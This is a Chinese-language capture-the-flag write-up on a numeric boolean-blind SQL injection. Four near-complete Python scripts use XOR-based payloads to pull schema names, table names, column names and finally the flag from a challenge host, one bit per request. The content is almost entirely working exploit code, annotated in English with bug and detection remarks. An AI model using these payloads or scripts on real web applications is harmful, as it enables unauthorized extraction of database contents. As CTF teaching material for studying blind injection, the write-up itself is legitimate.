一上来可以发现是数字类型盲注
显示的是1的界面
那么可以沿用之前 [极客大挑战 2019]FinalSQL1 的脚本来跑
利用 ^（异或）进行盲注
首先爆数据库名
import requests
import time
# Recovered characters are appended here one at a time (see the chr() call at the bottom).
database_all = ''
# Base URL; each probe string below is concatenated directly after the stunum=1 value.
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# Detection note: this produces a long burst of sequential GETs to one endpoint whose
# query parameter carries substr(bin(ascii(... / information_schema — a boolean-blind
# signature that a WAF rule or a per-parameter request-rate alert would surface.
# Step 1: work out how many digits the total length has (e.g. a length of 43 has 2 digits).
# Each probe reads one bit of bin(ascii(...)); a response body containing 'admin' is the "true" oracle.
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)))))),{},1)=1)^1".format(i)
# NOTE: `re` is a requests.Response here, not the regex module; timeout is 1000 seconds per request.
re = requests.get(url+sql, timeout=1000)
# A non-200 response appends no bit, so `weishu` can end up shorter than 6 bits and
# int(weishu, 2) below then decodes a different value (or raises ValueError on '').
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
# chr() yields exactly one character, so this only handles a digit count of 1–9.
weishu = int(chr(int(weishu, 2)))
# Step 2: recover the total length itself, one decimal digit at a time.
len = ''    # NOTE: shadows the builtin len() for the rest of the script
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
# Same caveat as above: an empty len_wei (all non-200) makes int(len_wei, 2) raise.
len += chr(int(len_wei, 2))
# Step 3: recover each character. range() is evaluated once, so rebinding `len` to 6/7
# inside the loop does not change the iteration count — but after the first pass `len`
# no longer holds the total length.
for i in range(1, int(len)+1):
# Probe whether bin(ascii(char)) is 7 bits long (value >= 64) or 6; this fixes how many
# bit probes the inner loop makes for this character.
sql = "^(length(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
# One-second pause between character probes; the length loops above have none.
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''    # NOTE: shadows the builtin str() for the rest of the script
for j in range(1, len+1):
sql = '^(substr(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))),{},1)=1)^1'.format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
# Bits are assembled MSB-first in the order probed (j=1 is the leftmost bit of bin()).
database_all += chr(int(str, 2))
print(database_all)
接着爆表名
import requests
import time
# Recovered characters are appended here one at a time (see the chr() call at the bottom).
database_all = ''
# Base URL; each probe string below is concatenated directly after the stunum=1 value.
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# Same structure as the schema-name script; only the inner SELECT changed
# (TABLE_NAME from information_schema.TABLES filtered on table_schema='ctf').
# Step 1: work out how many digits the total length has (e.g. a length of 43 has 2 digits).
# A response body containing 'admin' is the "true" oracle for each bit probe.
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf')))))),{},1)=1)^1".format(i)
# NOTE: `re` is a requests.Response here, not the regex module; timeout is 1000 seconds per request.
re = requests.get(url+sql, timeout=1000)
# A non-200 response appends no bit, so `weishu` can end up shorter than 6 bits and
# int(weishu, 2) below then decodes a different value (or raises ValueError on '').
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
# chr() yields exactly one character, so this only handles a digit count of 1–9.
weishu = int(chr(int(weishu, 2)))
# Step 2: recover the total length itself, one decimal digit at a time.
len = ''    # NOTE: shadows the builtin len() for the rest of the script
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf'))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
# An empty len_wei (all non-200) makes int(len_wei, 2) raise.
len += chr(int(len_wei, 2))
# Step 3: recover each character. range() is evaluated once, so rebinding `len` to 6/7
# inside the loop does not change the iteration count — but after the first pass `len`
# no longer holds the total length.
for i in range(1, int(len)+1):
# Probe whether bin(ascii(char)) is 7 bits long (value >= 64) or 6; this fixes how many
# bit probes the inner loop makes for this character.
sql = "^(length(bin(ascii(substr((select(group_concat(TABLE_NAME))from(information_schema.tables)where(table_schema='ctf')),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
# One-second pause between character probes; the length loops above have none.
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''    # NOTE: shadows the builtin str() for the rest of the script
for j in range(1, len+1):
sql = "^(substr(bin(ascii(substr((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf')),{},1))),{},1)=1)^1".format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
# Bits are assembled MSB-first in the order probed (j=1 is the leftmost bit of bin()).
database_all += chr(int(str, 2))
print(database_all)
接着爆列名
import requests
import time
# Recovered characters are appended here one at a time (see the chr() call at the bottom).
database_all = ''
# Base URL; each probe string below is concatenated directly after the stunum=1 value.
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# Same structure as the previous scripts; only the inner SELECT changed
# (COLUMN_NAME from information_schema.COLUMNS filtered on table_NAME='flag').
# Step 1: work out how many digits the total length has (e.g. a length of 43 has 2 digits).
# A response body containing 'admin' is the "true" oracle for each bit probe.
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag')))))),{},1)=1)^1".format(i)
# NOTE: `re` is a requests.Response here, not the regex module; timeout is 1000 seconds per request.
re = requests.get(url+sql, timeout=1000)
# A non-200 response appends no bit, so `weishu` can end up shorter than 6 bits and
# int(weishu, 2) below then decodes a different value (or raises ValueError on '').
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
# chr() yields exactly one character, so this only handles a digit count of 1–9.
weishu = int(chr(int(weishu, 2)))
# Step 2: recover the total length itself, one decimal digit at a time.
len = ''    # NOTE: shadows the builtin len() for the rest of the script
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag'))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
# An empty len_wei (all non-200) makes int(len_wei, 2) raise.
len += chr(int(len_wei, 2))
# Step 3: recover each character. range() is evaluated once, so rebinding `len` to 6/7
# inside the loop does not change the iteration count — but after the first pass `len`
# no longer holds the total length.
for i in range(1, int(len)+1):
# Probe whether bin(ascii(char)) is 7 bits long (value >= 64) or 6; this fixes how many
# bit probes the inner loop makes for this character.
sql = "^(length(bin(ascii(substr((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNs)where(table_NAME='flag')),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
# One-second pause between character probes; the length loops above have none.
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''    # NOTE: shadows the builtin str() for the rest of the script
for j in range(1, len+1):
sql = "^(substr(bin(ascii(substr((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag')),{},1))),{},1)=1)^1".format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
# Bits are assembled MSB-first in the order probed (j=1 is the leftmost bit of bin()).
database_all += chr(int(str, 2))
print(database_all)
爆flag
import requests
import time
# Recovered characters are appended here one at a time (see the chr() call at the bottom).
database_all = ''
# Base URL; each probe string below is concatenated directly after the stunum=1 value.
url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# Same structure as the previous scripts; only the inner SELECT changed
# (the `value` column of ctf.flag).
# Step 1: work out how many digits the total length has (e.g. a length of 43 has 2 digits).
# A response body containing 'admin' is the "true" oracle for each bit probe.
weishu = ''
for i in range(1, 7):
sql = "^(substr(bin(ascii(length(length((select(group_concat(value))from(ctf.flag)))))),{},1)=1)^1".format(i)
# NOTE: `re` is a requests.Response here, not the regex module; timeout is 1000 seconds per request.
re = requests.get(url+sql, timeout=1000)
# A non-200 response appends no bit, so `weishu` can end up shorter than 6 bits and
# int(weishu, 2) below then decodes a different value (or raises ValueError on '').
if re.status_code == 200:
if 'admin' in re.text:
weishu += '1'
else:
weishu += '0'
# chr() yields exactly one character, so this only handles a digit count of 1–9.
weishu = int(chr(int(weishu, 2)))
# Step 2: recover the total length itself, one decimal digit at a time.
len = ''    # NOTE: shadows the builtin len() for the rest of the script
for i in range(1, weishu+1):
len_wei = ''
for j in range(1, 7):
sql = "^(substr(bin(ascii(substr(length((select(group_concat(value))from(ctf.flag))),{},1))),{},1)=1)^1".format(i, j)
re = requests.get(url+sql, timeout=1000)
if re.status_code == 200:
if 'admin' in re.text:
len_wei += '1'
else:
len_wei += '0'
# An empty len_wei (all non-200) makes int(len_wei, 2) raise.
len += chr(int(len_wei, 2))
# Step 3: recover each character. range() is evaluated once, so rebinding `len` to 6/7
# inside the loop does not change the iteration count — but after the first pass `len`
# no longer holds the total length.
for i in range(1, int(len)+1):
# Probe whether bin(ascii(char)) is 7 bits long (value >= 64) or 6; this fixes how many
# bit probes the inner loop makes for this character.
sql = "^(length(bin(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))))=7)^1".format(i)
re = requests.get(url+sql, timeout=1000)
# One-second pause between character probes; the length loops above have none.
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
len = 7
else:
len = 6
str = ''    # NOTE: shadows the builtin str() for the rest of the script
for j in range(1, len+1):
sql = "^(substr(bin(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))),{},1)=1)^1".format(
i, j)
re = requests.get(url+sql, timeout=1000)
time.sleep(1)
if re.status_code == 200:
if 'admin' in re.text:
str += '1'
else:
str += '0'
# Bits are assembled MSB-first in the order probed (j=1 is the leftmost bit of bin()).
database_all += chr(int(str, 2))
print(database_all)